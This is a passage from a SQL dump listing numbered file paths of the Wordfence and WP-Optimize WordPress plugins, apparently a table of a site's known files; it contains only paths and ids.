ent/plugins/wordfence/vendor/geoip2/geoip2/src/Model/City.php'),(6267,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/ConnectionType.php'),(6268,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Country.php'),(6269,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Domain.php'),(6270,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Enterprise.php'),(6271,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Insights.php'),(6272,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Isp.php'),(6273,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/ProviderInterface.php'),(6274,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractPlaceRecord.php'),(6275,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractRecord.php'),(6276,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/City.php'),(6277,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Continent.php'),(6278,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Country.php'),(6279,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Location.php'),(6280,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/MaxMind.php'),(6281,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Postal.php'),(6282,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/RepresentedCountry.php'),(6283,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Subdivision.php'),(6284,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Traits.php'),(6285,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/WebService/Client.php'),(6286,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/LICENSE'),(6287,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/AuthenticationException.php'),(6288,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/HttpException.php'),(6289,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InsufficientFundsException.php'),(6290,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidInputException.php'),(6291,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidRequestException.php'),(6292,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/IpAddressNotFoundException.php'),(6293,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/PermissionRequiredException.php'),(6294,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/WebServiceException.php'),(6295,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Client.php'),(6296,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/CurlRequest.php'),(6297,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/Request.php'),(6298,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/RequestFactory.php'),(6299,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/LICENSE'),(6300,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/autoload.php'),(6301,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Decoder.php'),(6302,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/InvalidDatabaseException.php'),(6303,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Metadata.php'),(6304,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Util.php'),(6305,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader.php'),(6306,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem'),(6307,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key'),(6308,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php'),(6309,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php'),(6310,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php'),(6311,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php'),(6312,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php'),(6313,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php'),(6314,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php'),(6315,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php'),(6316,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php'),(6317,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php'),(6318,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php'),(6319,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php'),(6320,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php'),(6321,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php'),(6322,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php'),(6323,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php'),(6324,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key'),(6325,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php'),(6326,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php'),(6327,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php'),(6328,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php'),(6329,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php'),(6330,'wp-content/plugins/wordfence/views/.htaccess'),(6331,'wp-content/plugins/wordfence/views/blocking/block-list.php'),(6332,'wp-content/plugins/wordfence/views/blocking/blocking-create.php'),(6333,'wp-content/plugins/wordfence/views/blocking/blocking-status.php'),(6334,'wp-content/plugins/wordfence/views/blocking/country-block-map.php'),(6335,'wp-content/plugins/wordfence/views/blocking/country-modal.php'),(6336,'wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php'),(6337,'wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php'),(6338,'wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php'),(6339,'wp-content/plugins/wordfence/views/common/block-navigation-option.php'),(6340,'wp-content/plugins/wordfence/views/common/indeterminate-progress.php'),(6341,'wp-content/plugins/wordfence/views/common/license.php'),(6342,'wp-content/plugins/wordfence/views/common/modal-prompt.php'),(6343,'wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php'),(6344,'wp-content/plugins/wordfence/views/common/page-help.php'),(6345,'wp-content/plugins/wordfence/views/common/page-tabbar.php'),(6346,'wp-content/plugins/wordfence/views/common/page-title.php'),(6347,'wp-content/plugins/wordfence/views/common/section-subtitle.php'),(6348,'wp-content/plugins/wordfence/views/common/section-title.php'),(6349,'wp-content/plugins/wordfence/views/common/status-circular.php'),(6350,'wp-content/plugins/wordfence/views/common/status-critical.php'),(6351,'wp-content/plugins/wordfence/views/common/status-detail.php'),(6352,'wp-content/plugins/wordfence/views/common/status-tooltip.php'),(6353,'wp-content/plugins/wordfence/views/common/status-warning.php'),(6354,'wp-content/plugins/wordfence/views/common/unsubscribe.php'),(6355,'wp-content/plugins/wordfence/views/dashboard/global-status.php'),(6356,'wp-content/plugins/wordfence/views/dashboard/option-howgetips.php'),(6357,'wp-content/plugins/wordfence/views/dashboard/options-group-alert.php'),(6358,'wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php'),(6359,'wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php'),(6360,'wp-content/plugins/wordfence/views/dashboard/options-group-general.php'),(6361,'wp-content/plugins/wordfence/views/dashboard/options-group-import.php'),(6362,'wp-content/plugins/wordfence/views/dashboard/options-group-license.php'),(6363,'wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php'),(6364,'wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php'),(6365,'wp-content/plugins/wordfence/views/dashboard/status-renewing.php'),(6366,'wp-content/plugins/wordfence/views/gdpr/banner.php'),(6367,'wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php'),(6368,'wp-content/plugins/wordfence/views/onboarding/banner.php'),(6369,'wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php'),(6370,'wp-content/plugins/wordfence/views/onboarding/fresh-install.php'),(6371,'wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php'),(6372,'wp-content/plugins/wordfence/views/onboarding/overlay.php'),(6373,'wp-content/plugins/wordfence/views/onboarding/plugin-header.php'),(6374,'wp-content/plugins/wordfence/views/onboarding/tour-overlay.php'),(6375,'wp-content/plugins/wordfence/views/options/block-all-options-controls.php'),(6376,'wp-content/plugins/wordfence/views/options/block-controls.php'),(6377,'wp-content/plugins/wordfence/views/options/option-label.php'),(6378,'wp-content/plugins/wordfence/views/options/option-select.php'),(6379,'wp-content/plugins/wordfence/views/options/option-switch.php'),(6380,'wp-content/plugins/wordfence/views/options/option-text.php'),(6381,'wp-content/plugins/wordfence/views/options/option-textarea.php'),(6382,'wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php'),(6383,'wp-content/plugins/wordfence/views/options/option-toggled-multiple.php'),(6384,'wp-content/plugins/wordfence/views/options/option-toggled-segmented.php'),(6385,'wp-content/plugins/wordfence/views/options/option-toggled-select.php'),(6386,'wp-content/plugins/wordfence/views/options/option-toggled-sub.php'),(6387,'wp-content/plugins/wordfence/views/options/option-toggled-textarea.php'),(6388,'wp-content/plugins/wordfence/views/options/option-toggled.php'),(6389,'wp-content/plugins/wordfence/views/options/option-token.php'),(6390,'wp-content/plugins/wordfence/views/options/options-title.php'),(6391,'wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php'),(6392,'wp-content/plugins/wordfence/views/reports/activity-report.php'),(6393,'wp-content/plugins/wordfence/views/scanner/issue-base.php'),(6394,'wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php'),(6395,'wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php'),(6396,'wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php'),(6397,'wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php'),(6398,'wp-content/plugins/wordfence/views/scanner/issue-configReadable.php'),(6399,'wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php'),(6400,'wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php'),(6401,'wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php'),(6402,'wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php'),(6403,'wp-content/plugins/wordfence/views/scanner/issue-control-ignore.php'),(6404,'wp-content/plugins/wordfence/views/scanner/issue-control-repair.php'),(6405,'wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php'),(6406,'wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php'),(6407,'wp-content/plugins/wordfence/views/scanner/issue-database.php'),(6408,'wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php'),(6409,'wp-content/plugins/wordfence/views/scanner/issue-dnsChange.php'),(6410,'wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php'),(6411,'wp-content/plugins/wordfence/views/scanner/issue-file.php'),(6412,'wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php'),(6413,'wp-content/plugins/wordfence/views/scanner/issue-knownfile.php'),(6414,'wp-content/plugins/wordfence/views/scanner/issue-optionBadURL.php'),(6415,'wp-content/plugins/wordfence/views/scanner/issue-postBadTitle.php'),(6416,'wp-content/plugins/wordfence/views/scanner/issue-postBadURL.php'),(6417,'wp-content/plugins/wordfence/views/scanner/issue-publiclyAccessible.php'),(6418,'wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php'),(6419,'wp-content/plugins/wordfence/views/scanner/issue-suspiciousAdminUsers.php'),(6420,'wp-content/plugins/wordfence/views/scanner/issue-timelimit.php'),(6421,'wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php'),(6422,'wp-content/plugins/wordfence/views/scanner/issue-wfPluginAbandoned.php'),(6423,'wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php'),(6424,'wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php'),(6425,'wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php'),(6426,'wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php'),(6427,'wp-content/plugins/wordfence/views/scanner/issue-wfUpgrade.php'),(6428,'wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php'),(6429,'wp-content/plugins/wordfence/views/scanner/issue-wpscan_fullPathDiscl.php'),(6430,'wp-content/plugins/wordfence/views/scanner/no-issues.php'),(6431,'wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php'),(6432,'wp-content/plugins/wordfence/views/scanner/options-group-advanced.php'),(6433,'wp-content/plugins/wordfence/views/scanner/options-group-basic.php'),(6434,'wp-content/plugins/wordfence/views/scanner/options-group-general.php'),(6435,'wp-content/plugins/wordfence/views/scanner/options-group-performance.php'),(6436,'wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php'),(6437,'wp-content/plugins/wordfence/views/scanner/scan-failed.php'),(6438,'wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php'),(6439,'wp-content/plugins/wordfence/views/scanner/scan-progress-element.php'),(6440,'wp-content/plugins/wordfence/views/scanner/scan-progress.php'),(6441,'wp-content/plugins/wordfence/views/scanner/scan-results.php'),(6442,'wp-content/plugins/wordfence/views/scanner/scan-scheduling.php'),(6443,'wp-content/plugins/wordfence/views/scanner/scan-starter.php'),(6444,'wp-content/plugins/wordfence/views/scanner/scan-type.php'),(6445,'wp-content/plugins/wordfence/views/scanner/scanner-status.php'),(6446,'wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php'),(6447,'wp-content/plugins/wordfence/views/scanner/site-cleaning-bottom.php'),(6448,'wp-content/plugins/wordfence/views/scanner/site-cleaning-high-sense.php'),(6449,'wp-content/plugins/wordfence/views/scanner/site-cleaning.php'),(6450,'wp-content/plugins/wordfence/views/tools/options-group-2fa.php'),(6451,'wp-content/plugins/wordfence/views/tools/options-group-live-traffic.php'),(6452,'wp-content/plugins/wordfence/views/tours/login-security.php'),(6453,'wp-content/plugins/wordfence/views/waf/debug.php'),(6454,'wp-content/plugins/wordfence/views/waf/firewall-status.php'),(6455,'wp-content/plugins/wordfence/views/waf/option-rate-limit.php'),(6456,'wp-content/plugins/wordfence/views/waf/option-rules.php'),(6457,'wp-content/plugins/wordfence/views/waf/option-whitelist.php'),(6458,'wp-content/plugins/wordfence/views/waf/options-group-advanced-firewall.php'),(6459,'wp-content/plugins/wordfence/views/waf/options-group-basic-firewall.php'),(6460,'wp-content/plugins/wordfence/views/waf/options-group-brute-force.php'),(6461,'wp-content/plugins/wordfence/views/waf/options-group-rate-limiting.php'),(6462,'wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php'),(6463,'wp-content/plugins/wordfence/views/waf/status-tooltip-learning-mode.php'),(6464,'wp-content/plugins/wordfence/views/waf/waf-install-manual.php'),(6465,'wp-content/plugins/wordfence/views/waf/waf-install-success.php'),(6466,'wp-content/plugins/wordfence/views/waf/waf-install.php'),(6467,'wp-content/plugins/wordfence/views/waf/waf-modal-wrapper.php'),(6468,'wp-content/plugins/wordfence/views/waf/waf-uninstall-success.php'),(6469,'wp-content/plugins/wordfence/views/waf/waf-uninstall.php'),(6470,'wp-content/plugins/wordfence/waf/.htaccess'),(6471,'wp-content/plugins/wordfence/waf/bootstrap.php'),(6472,'wp-content/plugins/wordfence/waf/wfWAFGeoIP2.php'),(6473,'wp-content/plugins/wordfence/waf/wfWAFIPBlocksController.php'),(6474,'wp-content/plugins/wordfence/waf/wfWAFUserIPRange.php'),(6475,'wp-content/plugins/wordfence/wordfence.php'),(6476,'wp-content/plugins/wp-optimize/LICENSE.txt'),(6477,'wp-content/plugins/wp-optimize/cache/class-cache-commands.php'),(6478,'wp-content/plugins/wp-optimize/cache/class-wpo-cache-config.php'),(6479,'wp-content/plugins/wp-optimize/cache/class-wpo-cache-preloader.php'),(6480,'wp-content/plugins/wp-optimize/cache/class-wpo-cache-rules.php'),(6481,'wp-content/plugins/wp-optimize/cache/class-wpo-detect-cache-plugins.php'),(6482,'wp-content/plugins/wp-optimize/cache/class-wpo-load-url-task.php'),(6483,'wp-content/plugins/wp-optimize/cache/class-wpo-page-cache.php'),(6484,'wp-content/plugins/wp-optimize/cache/file-based-page-cache-functions.php'),(6485,'wp-content/plugins/wp-optimize/cache/file-based-page-cache.php'),(6486,'wp-content/plugins/wp-optimize/css/admin-3-0-11.min.css'),(6487,'wp-content/plugins/wp-optimize/css/admin-3-0-11.min.css.map'),(6488,'wp-content/plugins/wp-optimize/css/admin.css'),(6489,'wp-content/plugins/wp-optimize/css/smush-3-0-11.min.css'),(6490,'wp-content/plugins/wp-optimize/css/smush-3-0-11.min.css.map'),(6491,'wp-content/plugins/wp-optimize/css/smush.css'),(6492,'wp-content/plugins/wp-optimize/css/tablesorter/theme.default.min.css'),(6493,'wp-content/plugins/wp-optimize/css/wp-optimize-admin-3-0-11.min.css'),(6494,'wp-content/plugins/wp-optimize/css/wp-optimize-admin-3-0-11.min.css.map'),(6495,'wp-content/plugins/wp-optimize/css/wp-optimize-admin.css'),(6496,'wp-content/plugins/wp-optimize/css/wp-optimize-notices-3-0-11.min.css'),(6497,'wp-content/plugins/wp-optimize/css/wp-optimize-notices-3-0-11.min.css.map'),(6498,'wp-content/plugins/wp-optimize/css/wp-optimize-notices.css'),(6499,'wp-content/plugins/wp-optimize/images/features/auto-optimize.png'),(6500,'wp-content/plugins/wp-optimize/images/features/automatic-clean-ups.png'),(6501,'wp-content/plugins/wp-optimize/images/features/automatically cleans.png'),(6502,'wp-content/plugins/wp-optimize/images/features/cache-vehicle-64x64.png'),(6503,'wp-content/plugins/wp-optimize/images/features/choice-n-flexibility.png'),(6504,'wp-content/plugins/wp-optimize/images/features/database-optimization-vehicle-64x64.png'),(6505,'wp-content/plugins/wp-optimize/images/features/displays-database-table-sta.png'),(6506,'wp-content/plugins/wp-optimize/images/features/enables-disables-trackbacks.png'),(6507,'wp-content/plugins/wp-optimize/images/features/enhanced-robustness.png'),(6508,'wp-content/plugins/wp-optimize/images/features/image-compression-vehicle-64x64.png'),(6509,'wp-content/plugins/wp-optimize/images/features/keyy_logo.png'),(6510,'wp-content/plugins/wp-optimize/images/features/lazy-load.png'),(6511,'wp-content/plugins/wp-optimize/images/features/logging-n-reporting.png'),(6512,'wp-content/plugins/wp-optimize/images/features/metaslider_logo.png'),(6513,'wp-content/plugins/wp-optimize/images/features/more-settings.png'),(6514,'wp-content/plugins/wp-optimize/images/features/multisite-support.png'),(6515,'wp-content/plugins/wp-optimize/images/features/number_of_weeks.png'),(6516,'wp-content/plugins/wp-optimize/images/features/optimization-preview.png'),(6517,'wp-content/plugins/wp-optimize/images/features/optimize-individual.png'),(6518,'wp-content/plugins/wp-optimize/images/features/premium-support.png'),(6519,'wp-content/plugins/wp-optimize/images/features/remove-unwanted-img.png'),(6520,'wp-content/plugins/wp-optimize/images/features/scheduling.png'),(6521,'wp-content/plugins/wp-optimize/images/features/updraftcentral_logo.png'),(6522,'wp-content/plugins/wp-optimize/images/features/updraftplus_logo.png'),(6523,'wp-content/plugins/wp-optimize/images/features/wp-cli.png'),(6524,'wp-content/plugins/wp-optimize/images/icon/wpo.png'),(6525,'wp-content/plugins/wp-optimize/images/logo/udp_logo_small.png'),(6526,'wp-content/plugins/wp-optimize/images/logo/wpo_logo_small.png'),(6527,'wp-content/plugins/wp-optimize/images/notices/black_friday.png'),(6528,'wp-content/plugins/wp-optimize/images/notices/cache-video-preview.png'),(6529,'wp-content/plugins/wp-optimize/images/notices/christmas.png'),(6530,'wp-content/plugins/wp-optimize/images/notices/image-compression-video-preview.png'),(6531,'wp-content/plugins/wp-optimize/images/notices/keyy_logo.png'),(6532,'wp-content/plugins/wp-optimize/images/notices/logo-bg-notice.png'),(6533,'wp-content/plugins/wp-optimize/images/notices/metaslider_logo.png'),(6534,'wp-content/plugins/wp-optimize/images/notices/new_year.png'),(6535,'wp-content/plugins/wp-optimize/images/notices/spring.png'),(6536,'wp-content/plugins/wp-optimize/images/notices/summer.png'),(6537,'wp-content/plugins/wp-optimize/images/notices/updraft_logo.png'),(6538,'wp-content/plugins/wp-optimize/images/notices/wp_optimize_logo.png'),(6539,'wp-content/plugins/wp-optimize/includes/backward-compatibility-functions.php'),(6540,'wp-content/plugins/wp-optimize/includes/class-commands.php'),(6541,'wp-content/plugins/wp-optimize/includes/class-updraft-abstract-logger.php'),(6542,'wp-content/plugins/wp-optimize/includes/class-updraft-email-logger.php'),(6543,'wp-content/plugins/wp-optimize/includes/class-updraft-file-logger.php'),(6544,'wp-content/plugins/wp-optimize/includes/class-updraft-log-levels.php'),(6545,'wp-content/plugins/wp-optimize/includes/class-updraft-logger-interface.php'),(6546,'wp-content/plugins/wp-optimize/includes/class-updraft-logger.php'),(6547,'wp-content/plugins/wp-optimize/includes/class-updraft-nitrosmush-task.php'),(6548,'wp-content/plugins/wp-optimize/includes/class-updraft-php-logger.php'),(6549,'wp-content/plugins/wp-optimize/includes/class-updraft-resmushit-task.php'),(6550,'wp-content/plugins/wp-optimize/includes/class-updraft-ring-logger.php'),(6551,'wp-content/plugins/wp-optimize/includes/class-updraft-smush-manager-commands.php'),(6552,'wp-content/plugins/wp-optimize/includes/class-updraft-smush-manager.php'),(6553,'wp-content/plugins/wp-optimize/includes/class-updraft-smush-task.php'),(6554,'wp-content/plugins/wp-optimize/includes/class-updraftcentral-wp-optimize-commands.php'),(6555,'wp-content/plugins/wp-optimize/includes/class-wp-optimization.php'),(6556,'wp-content/plugins/wp-optimize/includes/class-wp-optimize-browser-cache.php'),(6557,'wp-content/plugins/wp-optimize/includes/class-wp-optimize-gzip-compression.php'),(6558,'wp-content/plugins/wp-optimize/includes/class-wp-optimize-htaccess.php'),(6559,'wp-content/plugins/wp-optimize/includes/class-wp-optimize-install-or-update-notice.php'),(6560,'wp-content/plugins/wp-optimize/includes/class-wp-optimize-options.php'),(6561,'wp-content/plugins/wp-optimize/includes/class-wp-optimize-transients-cache.php'),(6562,'wp-content/plugins/wp-optimize/includes/class-wp-optimizer.php'),(6563,'wp-content/plugins/wp-optimize/includes/updraft-notices.php'),(6564,'wp-content/plugins/wp-optimize/includes/updraftcentral.php'),(6565,'wp-content/plugins/wp-optimize/includes/wp-optimize-database-information.php'),(6566,'wp-content/plugins/wp-optimize/includes/wp-optimize-notices.php'),(6567,'wp-content/plugins/wp-optimize/index.html'),(6568,'wp-content/plugins/wp-optimize/js/cache-3-0-11.min.js'),(6569,'wp-content/plugins/wp-optimize/js/cache.js'),(6570,'wp-content/plugins/wp-optimize/js/handlebars/LICENSE'),(6571,'wp-content/plugins/wp-optimize/js/handlebars/handlebars.js'),(6572,'wp-content/plugins/wp-optimize/js/handlebars/handlebars.min.js'),(6573,'wp-content/plugins/wp-optimize/js/handlebars/handlebars.runtime.js'),(6574,'wp-content/plugins/wp-optimize/js/handlebars/handlebars.runtime.min.js'),(6575,'wp-content/plugins/wp-optimize/js/jquery.blockUI.js'),(6576,'wp-content/plugins/wp-optimize/js/jquery.blockUI.min.js'),(6577,'wp-content/plugins/wp-optimize/js/queue-3-0-11.min.js'),(6578,'wp-content/plugins/wp-optimize/js/queue.js'),(6579,'wp-content/plugins/wp-optimize/js/serialize-json/jquery.serializejson.js'),(6580,'wp-content/plugins/wp-optimize/js/serialize-json/jquery.serializejson.min.js'),(6581,'wp-content/plugins/wp-optimize/js/tablesorter/jquery.tablesorter.js'),(6582,'wp-content/plugins/wp-optimize/js/tablesorter/jquery.tablesorter.min.js'),(6583,'wp-content/plugins/wp-optimize/js/tablesorter/jquery.tablesorter.widgets.js'),(6584,'wp-content/plugins/wp-optimize/js/tablesorter/jquery.tablesorter.widgets.min.js'),(6585,'wp-content/plugins/wp-optimize/js/wpoadmin-3-0-11.min.js'),(6586,'wp-content/plugins/wp-optimize/js/wpoadmin.js'),(6587,'wp-content/plugins/wp-optimize/js/wposmush-3-0-11.min.js'),(6588,'wp-content/plugins/wp-optimize/js/wposmush.js'),(6589,'wp-content/plugins/wp-optimize/languages/wp-optimize.pot'),(6590,'wp-content/plugins/wp-optimize/optimizations/attachments.php'),(6591,'wp-content/plugins/wp-optimize/optimizations/autodraft.php'),(6592,'wp-content/plugins/wp-optimize/optimizations/commentmeta.php'),(6593,'wp-content/plugins/wp-optimize/optimizations/inactive-tags.php'),(6594,'wp-content/plugins/wp-optimize/optimizations/optimizetables.php'),(6595,'wp-content/plugins/wp-optimize/optimizations/orphandata.php'),(6596,'wp-content/plugins/wp-optimize/optimizations/orphanedtables.php'),(6597,'wp-content/plugins/wp-optimize/optimizations/pingbacks.php'),(6598,'wp-content/plugins/wp-optimize/optimizations/postmeta.php'),(6599,'wp-content/plugins/wp-optimize/optimizations/repairtables.php'),(6600,'wp-content/plugins/wp-optimize/optimizations/revisions.php'),(6601,'wp-content/plugins/wp-optimize/optimizations/spam.php'),(6602,'wp-content/plugins/wp-optimize/optimizations/trackbacks.php'),(6603,'wp-content/plugins/wp-optimize/optimizations/transient.php'),(6604,'wp-content/plugins/wp-optimize/optimizations/trash.php'),(6605,'wp-content/plugins/wp-optimize/optimizations/unapproved.php'),(6606,'wp-content/plugins/wp-optimize/plugin.json'),(6607,'wp-content/plugins/wp-optimize/readme.txt'),(6608,'wp-content/plugins/wp-optimize/templates/admin-metabox-smush.php'),(6609,'wp-content/plugins/wp-optimize/templates/admin-page-header-tabs.php'),(6610,'wp-content/plugins/wp-optimize/templates/admin-page-header.php'),(6611,'wp-content/plugins/wp-optimize/templates/cache/browser-cache.php'),(6612,'wp-content/plugins/wp-optimize/templates/cache/gzip-compression.php'),(6613,'wp-content/plugins/wp-optimize/templates/cache/page-cache-advanced.php'),(6614,'wp-content/plugins/wp-optimize/templates/cache/page-cache-preload.php'),(6615,'wp-content/plugins/wp-optimize/templates/cache/page-cache.php'),(6616,'wp-content/plugins/wp-optimize/templates/database/optimizations-table.php'),(6617,'wp-content/plugins/wp-optimize/templates/database/optimize-table.php'),(6618,'wp-content/plugins/wp-optimize/templates/database/tables-body.php'),(6619,'wp-content/plugins/wp-optimize/templates/database/tables.php'),(6620,'wp-content/plugins/wp-optimize/templates/handlebars-compiled-3-0-11.js'),(6621,'wp-content/plugins/wp-optimize/templates/images/lazyload.php'),(6622,'wp-content/plugins/wp-optimize/templates/images/smush.php'),(6623,'wp-content/plugins/wp-optimize/templates/images/unused.php'),(6624,'wp-content/plugins/wp-optimize/templates/info-message.php'),(6625,'wp-content/plugins/wp-optimize/templates/notices/horizontal-notice.php'),(6626,'wp-content/plugins/wp-optimize/templates/notices/install-or-update-notice.php'),(6627,'wp-content/plugins/wp-optimize/templates/notices/thanks-for-using-main-dash.php'),(6628,'wp-content/plugins/wp-optimize/templates/pages-menu.php'),(6629,'wp-content/plugins/wp-optimize/templates/settings/may-also-like.php'),(6630,'wp-content/plugins/wp-optimize/templates/settings/settings-auto-cleanup.php'),(6631,'wp-content/plugins/wp-optimize/templates/settings/settings-general.php'),(6632,'wp-content/plugins/wp-optimize/templates/settings/settings-logging.php'),(6633,'wp-content/plugins/wp-optimize/templates/settings/settings-trackback-and-comments.php'),(6634,'wp-content/plugins/wp-optimize/templates/settings/settings.php'),(6635,'wp-content/plugins/wp-optimize/templates/settings/status-box-contents.php'),(6636,'wp-content/plugins/wp-optimize/templates/settings/support-and-faqs.php'),(6637,'wp-content/plugins/wp-optimize/templates/take-a-backup.php'),(6638,'wp-content/plugins/wp-optimize/vendor/autoload.php'),(6639,'wp-content/plugins/wp-optimize/vendor/composer/ClassLoader.php'),(6640,'wp-content/plugins/wp-optimize/vendor/composer/LICENSE'),(6641,'wp-content/plugins/wp-optimize/vendor/composer/autoload_classmap.php'),(6642,'wp-content/plugins/wp-optimize/vendor/composer/autoload_namespaces.php'),(6643,'wp-content/plugins/wp-optimize/vendor/composer/autoload_psr4.php'),(6644,'wp-content/plugins/wp-optimize/vendor/composer/autoload_real.php'),(6645,'wp-content/plugins/wp-optimize/vendor/composer/autoload_static.php'),(6646,'wp-content/plugins/wp-optimize/vendor/composer/installed.json'),(6647,'wp-content/plugins/wp-optimize/vendor/team-updraft/common-libs/README.md'),(6648,'wp-content/plugins/wp-optimize/vendor/team-updraft/common-libs/composer.json'),(6649,'wp-content/plugins/wp-optimize/vendor/team-updraft/common-libs/src/updraft-semaphore/class-updraft-semaphore.php'),(6650,'wp-content/plugins/wp-optimize/vendor/team-updraft/common-libs/src/updraft-tasks/class-updraft-task-manager-commands.php'),(6651,'wp-content/plugins/wp-optimize/vendor/team-updraft/common-libs/src/updraft-tasks/class-updraft-task-manager.php'),(6652,'wp-content/plugins/wp-optimize/vendor/team-updraft/common-libs/src/updraft-tasks/class-updraft-task-meta.php'),(6653,'wp-content/plugins/wp-optimize/vendor/team-updraft/common-libs/src/updraft-tasks/class-updraft-task-options.php'),(6654,'wp-content/plugins/wp-optimize/vendor/team-updraft/common-libs/src/updraft-tasks/class-updraft-task.php'),(6655,'wp-content/plugins/wp-optimize/vendor/team-updraft/common-libs/src/updraft-tasks/class-updraft-tasks-activation.php'),(6656,'